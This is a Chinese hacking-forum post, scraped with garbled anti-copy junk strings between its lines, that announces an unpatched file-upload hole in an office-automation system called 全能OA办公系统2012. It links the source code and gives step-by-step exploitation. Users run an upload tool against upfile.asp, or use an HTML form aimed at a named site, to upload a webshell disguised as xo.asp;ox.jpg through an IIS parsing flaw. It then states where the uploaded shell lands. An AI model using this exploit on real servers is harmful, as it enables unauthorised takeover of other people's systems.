全能OA办公系统0day OA办公系统漏洞 上传漏洞

admin

全能OA办公系统 上传漏洞
" k) m$ A* y( l. p$ F; G​
系统介绍：
: J  r; F7 a9 L# v- `6 Y
4 ^) T- L. U. Z- O0 J  j全能OA办公系统2012是功能非常强大的OA系统，目前功能已完全能满足日常办公需要。

" K- b: t! }/ Z2 ?/ S- V: o/ K主要功能：
公司通告
工作计划
通讯助理
客户资源
2 f4 T: E+ k8 {% H9 O: T我的公文
& u' G! N  V9 d5 q公文传阅
公共资源
资源预约
- f2 Z* T2 f: _6 q- W! g! U  M9 E今日考勤
个人计划
个人通讯录
个人基本档案
, i) z$ N0 i7 t. P2 w1 j" Z  A未读邮件
发邮件
  U! Y1 C' ~7 W. h. C; }收件夹
寄件夹
网络硬盘
网络会议
% W+ u3 _4 m' G& U6 m% h网络调查
- x! M2 [  z1 N" x" x( R交流论坛
  \. o. \5 R7 B3 ~& v7 V* O7 p
- @' w# K# o# S& |1 y, i有兴趣测试的朋友可以下源码看看

源码下载：

http://www.mycodes.net/30/4750.htm
! L- H: K9 o! @6 A. k- m& Y
漏洞介绍：

+ Y+ P, b8 y# V) c2 U  F+ M6 n由upfile.asp上传文件漏洞引起

3 W. ]+ x$ a+ T; o" g1 Y' T6 {" t测试方法：

; @6 N+ G7 d) p' L* `3 u使用名小子上传http://www.itlynn.com/upfile.asp即可

5 v/ j& ?% K: [* m3 s0 |  P% q$ E如果upfile.asp文件被删除不存在。

  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。

如果存在那么将如下代码保存为upfile.html。

$ w9 v% N, |* K1 G6 ~5 f9 R然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
8 x6 X% j" E; k. P' x
; R' B6 R" d& U4 y6 Y
( h( r* w1 p& N7 w6 m# V
01 <table border='0' align="center" cellpadding="5">
# C* K: H: Y. O7 _' x5 ]4 [/ T7 j% R
6 @4 c" a+ v  \: j- }02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">

! w/ @* m  Q  f- i) }03 <tr>

04             <td>报错：</td>
2 A( ~" o) D6 s' O) s. f
6 ?. z2 X6 z! P, w2 A# _05             <td><input type='radio' name='errnumber' value='0'>

06               自动更名

8 {& L; e' I2 k: K* u* O, ~( L07               <input type='radio' name='errnumber' value='1' checked>

08               报错方式

09               <input type='radio' name='errnumber' value='2'>

( j4 k3 n( a& Q# \, O10               直接覆盖</td>
7 b- Q) v% ^+ ]7 R% U; [; X1 O
11           </tr>

1 j* Y9 C; w+ `; q6 A# `9 E3 k12           <tr>
; W; f0 O. t1 f8 V+ A
1 M5 o1 n; x1 G/ j# E4 M: O% K$ w13             <td>主题：</td>

& _6 B5 g0 Q3 V! c! a' ]& C14             <td><input type='text' name='filename' size='30'></td>

6 k  W2 S: N8 z( P% Q& v15           </tr>
+ j  v+ l1 L) ]( G: c: M6 e
. I5 n4 K% Z' ~% w/ E9 ~1 N' k16           <tr>
9 q+ v6 c, S- B& d" s+ J7 W/ k3 e; Z
& ?; s  X/ f" x* f5 W  j( S. a5 v17             <td>文件：</td>
5 _. u/ U6 B1 }! z5 Y
8 _  w1 j. d" H/ e0 V1 o6 J* E% ~18             <td><input type="file"name="fruit"size="30"></td>
1 I9 D5 x' v% s) M0 \3 y% F0 Y; ^
19           </tr>

6 Z9 F6 r6 u" L20           <tr>

21             <td valign='top'>简介：</td>
, ]) s7 N  H" u" ^3 u$ ?6 C( F$ g
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
4 R& S: h$ D' _/ a! Z  ~. e
% l3 S- y& l! K: A. ]3 P23           </tr>
. p  d4 f% [2 K# n) m7 A) L
24   
1 C% C3 c( D% z  G7 S7 K9 \
3 Z* H; j( H8 o3 G6 d25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
4 k0 I6 G( ]& ]
26           </tr>
1 d% {* |" d% q$ o% i4 f( Z
27         </form>
4 G; x- v: A% l2 s
9 N: C, `4 g5 L+ ~1 F然后打开上传一个文件名为xo.asp;ox.jpg的文件。



( U$ J4 X0 G+ t& N上传成功后，马的路径是：http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
  B  B! r! [4 I$ e
此漏洞需要配合解析漏洞利用。
3 D+ X2 q( S* ~